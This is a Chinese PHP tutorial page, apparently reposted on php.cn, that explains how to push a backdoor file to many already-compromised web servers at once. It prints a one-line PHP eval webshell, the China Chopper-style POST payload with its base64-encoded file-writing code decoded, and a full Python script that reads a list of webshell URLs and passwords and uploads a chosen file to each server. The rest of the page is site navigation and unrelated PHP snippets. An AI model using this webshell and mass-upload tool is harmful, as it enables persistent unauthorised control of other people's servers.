文章 专题 AI工具 学习 下载 问答 源码 最近更新
PHP
会员中心 讲师中心 微信公众号
首页 > 后端开发 > php教程 > 正文

PHP实现批量上传单个文件,_PHP教程

php中文网
发布: 2016-07-12 09:02:01
原创
1320人浏览过

php实现批量上传单个文件,

很多时候当我们通过某个通用型rce漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文给大家介绍基于php如何实现这类需求。

0×01 原理分析

首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。

下面是最常见的php一句话木马:

<&#63;php eval($_POST[1]); &#63;>
登录后复制

当我们将一句话木马上传到web服务器上后,我们就可以直接在菜刀中输入上面的密码(如上例中的1)连接到服务器上来管理文件。

立即学习PHP免费学习笔记(深入)”;

那么,此处的菜刀如何通过简单的一句话就可以实现对服务器的管理和控制呢?通过分析菜刀的原理,我们不难发现菜刀是利用了eval这个函数来执行通过POST方法传过来的命令语句。

因此,如果我们想通过菜刀一句话木马来实现文件上传的话,只需要向远程服务里上包含一句话的url发送一个带文件写入命令的POST请求即可,比如:

POST:

1=@eval($_POST[z0]);&z0=echo $_SERVER['DOCUMENT_ROOT'];

上面代码包含2个部分:

1. 一句话的密码

2. 发送给服务器端的php执行代码

既然知道原理了,我们只需要发送如下的POST请求即可完成利用一句话上传文件的功能:

POST:

1=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9JF9QT1NUWyJ6MSJdOwokYz0kX1BPU1RbInoyIl07CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7&z1=L3Zhci93d3cvcm9vdC8xLnR4dA==&z2=aGVsbG8gd29ybGQh

仔细分析一下这段POST数据包含以下几个部分:

1. 首先是php一句话的密码1

2. 通过eval方法来执行base64解码后的z0,解码整理后显示如下:

@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$f=base64_decode($_POST["z1"]);
$c=base64_decode($_POST["z2"]);
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=1)  
  $buf.=substr($c,$i,1);
echo(@fwrite(fopen($f,"w"),$buf));
echo("|<-");
die();
登录后复制

3. 在z0中继续调用base64解码后的z1和z2,解码后如下:

z1=/var/www/root/1.txt
z2=hello world!
登录后复制

至此,我们可以很清楚的发现上面的POST请求的作用实际上是将一个写有hello world!的名为1.txt的文件上传至服务器上/var/www/root/路径下。

0×02 代码实现

基于上面的原理分析,我们可以利用下面的代码基于php一句话来实现文件批量上传:

#!/usr/bin/python 
#coding=utf-8 
import urllib 
import urllib2
import sys
import base64
import re
def post(url, data): 
  req = urllib2.Request(url) 
  data = urllib.urlencode(data)  
  opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 
  response = opener.open(req, data) 
  return response.read() 
def get_shell_path(posturl,passwd):
  shell_path = ""
  try:
    data = {}
    data[passwd] = '@eval(base64_decode($_POST[z0]));'
    data['z0']='ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
    shell_path = post(posturl, data).strip()
  except Exception:
    pass
  return shell_path
def main():
  print '\n+++++++++Batch Uploading Local File (Only for PHP webshell)++++++++++\n'
  shellfile = sys.argv[1] # 存放webshell路径和密码的文件
  localfile = sys.argv[2] # 本地待上传的文件名
  shell_file = open(shellfile,'rb')
  local_content = str(open(localfile,'rb').read())
  for eachline in shell_file:
    posturl = eachline.split(',')[0].strip()
    passwd = eachline.split(',')[1].strip()
    try:
      reg = ".*/([^/]*\.php&#63;)"
      match_shell_name = re.search(reg,eachline)
      if match_shell_name:
        shell_name=match_shell_name.group(1)
        shell_path = get_shell_path(posturl,passwd).strip()
        target_path = shell_path.split(shell_name)[0]+localfile
        target_path_base64 = base64.b64encode(target_path)
        target_file_url = eachline.split(shell_name)[0]+localfile
        data = {}
        data[passwd] = '@eval(base64_decode($_POST[z0]));'
        data['z0']='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7'
        data['z1']=target_path_base64
        data['z2']=base64.b64encode(local_content)
        response = post(posturl, data)
        if response:
          print '[+] '+target_file_url+', upload succeed!'
        else:
          print '[-] '+target_file_url+', upload failed!'
      else:
        print '[-] '+posturl+', unsupported webshell!'
    except Exception,e:
      print '[-] '+posturl+', connection failed!'
  shell_file.close()
if __name__ == '__main__': 
  main()
登录后复制

webshell.txt的格式: [一句话webshell文件路径],[webshell连接密码]如下:

http://www.example1.com/1.php, 1

http://www.example2.com/1.php, 1

http://www.example3.com/1.php, 1

保存上面脚本为batch_upload_file.py,执行命令python batch_upload_file.py webshell.txt 1.txt,效果显示如下:


以上内容给大家介绍了PHP实现批量上传单个文件的相关知识,希望大家喜欢。

您可能感兴趣的文章:

  • php批量上传的实现代码
  • PHP批量上传图片的具体实现方法介绍.
  • PHP中使用Session配合Javascript实现文件上传进度条功能
  • PHP文件上传判断file是否己选择上传文件的方法
  • 一个经典的PHP文件上传类分享
  • 配置php.ini实现PHP文件上传功能
  • php+jQuery.uploadify实现文件上传教程
  • php上传文件并存储到mysql数据库的方法
  • php实现将上传word文件转为html的方法

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/1086655.htmlTechArticlePHP实现批量上传单个文件, 很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我...
PHP速学教程(入门到精通)
PHP速学教程(入门到精通)

PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!

下载
来源:php中文网
收藏 点赞
上一篇:前端学PHP之基础语法,前端php语法_PHP教程 下一篇:Yii使用技巧大汇总,Yii使用技巧汇总_PHP教程
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
PHP如何调用CMake构建 使用PHP执行CMake的3个示例 PHP调用CMake构建的核心方式是通过exec()、shell_exec()、system()等函数执行系统命令,但需注意权限控制、参数安全与错误处理。1.使用exec()或类似函数执行cmake命令进行配置与构建,确保路径正确并创建构建目录;2.传递参数时使用escapeshellarg()转义或白名单验证以防止命令注入;3.权限问题可通过修改目录权限、配置sudoers或使用setfacl解决;4.错误处理应检查返回码、捕获输出、记录日志并提供友好提示,推荐使用proc_open()实现实
2025-06-13 23:39:01
867
PHP怎样处理GraphQL突变 GraphQL数据变更操作技巧 GraphQL突变在PHP中用于执行创建、更新或删除数据等变更操作。1.定义Schema中的突变类型,包括名称、参数和返回值类型;2.实现Resolver函数,处理业务逻辑并与突变关联;3.创建脚本接收并解析GraphQL请求,执行对应Resolver;4.注重安全性,如输入验证、身份认证、速率限制及错误处理;5.优化性能,如批量处理、数据库事务、缓存及查询优化;6.实现文件上传需自定义Upload类型并在Resolver中处理文件。通过以上步骤可构建安全高效的GraphQLAPI。
2025-06-13 21:54:01
574
PHP中getcwd和__DIR__的目录获取区别 getcwd()和DIR的主要区别在于:getcwd()返回PHP脚本执行时的当前工作目录,而DIR返回的是当前脚本所在的目录。1.getcwd()获取的是当前PHP进程的工作目录,这个目录可以通过chdir()动态改变;2.DIR是魔术常量,返回脚本所在目录,静态且编译时确定。例如,在index.php中使用chdir('includes')改变工作目录后,getcwd()返回的是/var/www/html/includes,而DIR返回的是/var/www/html;3.在config.ph
2025-06-13 19:36:01
566
PHP中array()和[]定义数组的区别 PHP中array()和[]的主要区别在于语法和版本支持。1.array()函数适用于所有PHP版本,兼容性强;2.[]是PHP5.4引入的简写语法,更简洁但仅支持PHP5.4及以上版本;3.两者性能差异可忽略不计,选择应基于代码风格和项目需求;4.为提高可读性和维护性,建议在同一个项目中保持语法一致;5.编写需跨版本移植或维护老旧项目时,推荐使用array()函数。
2025-06-13 17:39:01
469
PHP文件压缩:ZipArchive使用 使用ZipArchive类压缩PHP文件可有效减小体积便于传输。具体步骤如下:1.使用RecursiveDirectoryIterator遍历目录并筛选PHP文件;2.通过ZipArchive对象创建或打开zip文件;3.将过滤后的PHP文件添加到压缩包中;4.关闭ZipArchive完成压缩。对于大型项目,可通过分批处理减少内存占用;排除特定文件则可在遍历过程中加入条件判断;解压时调用extractTo方法或使用第三方工具;优化压缩率可设置ZipArchive的压缩级别,或在压缩前精简代码。其
2025-06-13 15:30:02
544
PHP怎样处理GraphQL请求 GraphQL接口调用的4个步骤详解 PHP处理GraphQL请求的核心流程是接收请求、解析查询、执行并返回结果。GraphQL接口调用包括4个步骤:1.构建请求,确定endpoint并构造查询体;2.使用Guzzle等HTTP库发送POST请求;3.处理响应,解析JSON并捕获错误;4.展示所需数据。使用Guzzle时需先通过Composer安装,并创建客户端实例,将query和可选的variables以JSON格式发送。变量传递可通过在请求中添加variables字段实现。服务器错误可通过检查返回数据中的errors字段进行处理
2025-06-13 14:51:01
430
PHP如何保存Session值 PHP Session操作的5个技巧 Session过期后数据会丢失,因为默认存储在服务器上并由垃圾回收机制清理;防止Session劫持需使用HTTPS、设置Cookie属性、定期更换SessionID、验证用户信息、缩短过期时间及使用Token;跨域共享Session可通过设置Cookie域、JSONP、CORS、PostMessage或SSO实现;Session数据默认存于服务器文件中,也可存入数据库或缓存系统如Redis;销毁Session需依次执行session_unset()、删除Cookie及session_destro
2025-06-12 23:27:01
874
PHP如何获取传感器数据 读取传感器数据的3种采集方式 PHP获取传感器数据的核心在于通过中间硬件设备实现数据采集与传输。首先需选择如Arduino或树莓派等硬件接口读取传感器数据;其次通过HTTP/HTTPS、MQTT或串行通信等协议将数据传至服务器;最后由PHP脚本接收并处理数据。数据采集可采用定时轮询、事件触发或长连接等方式。选择硬件平台时应根据需求权衡功能与开发难度。MQTT协议因轻量级和良好的扩展性适用于物联网场景。为保障安全,应使用HTTPS或MQTT的TLS/SSL加密传输,并加强硬件固件安全防护措施。
2025-06-12 23:21:01
834
PHP怎样防止SQL注入 PHP防SQL注入的5个关键措施 防止SQL注入的核心方法是使用预处理语句和参数化查询,结合输入验证、输出编码、最小权限原则等措施。1.使用预处理语句(如PDO或MySQLi)将SQL结构与数据分离,防止恶意数据被当作SQL执行;2.对所有用户输入进行严格验证,确保其格式、类型和长度符合预期,例如使用intval()或filter_var()函数;3.在输出前对数据进行编码,如使用htmlspecialchars()防止XSS攻击;4.数据库连接使用最小权限账户,避免使用高权限账户;5.使用ORM框架自动处理SQL构建,降低注入
2025-06-12 23:15:01
764
php 向文章的随机段落插入图片,文章的是以p标签分割段落的 如果文章是以标签分割段落的,可以使用正则表达式来分割段落,并在随机段落中插入图片。以下是一个示例代码,演示如何实现这一过程:解释:读取文章内容:这里用一个示例字符串表示文章内容。使用正则表达式分割段落:使用 preg_match_all('/.*?/',$article,$matches) 将文章按  标签分割成段落数组。获取所有段落:$matches[0] 包含所有匹配的段落。选择随机段落:使用 rand(0,count($paragraphs)-1) 生成一个随机索引。插
2025-06-12 22:44:25
550
相关专题
更多>
热门推荐
开源免费商场系统广告
热门教程
更多>
相关推荐
热门推荐
最新课程
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
app下载
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习
PHP中文网抖音号
发现有趣的

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号

  • PHP学习

  • 技术支持

  • 返回顶部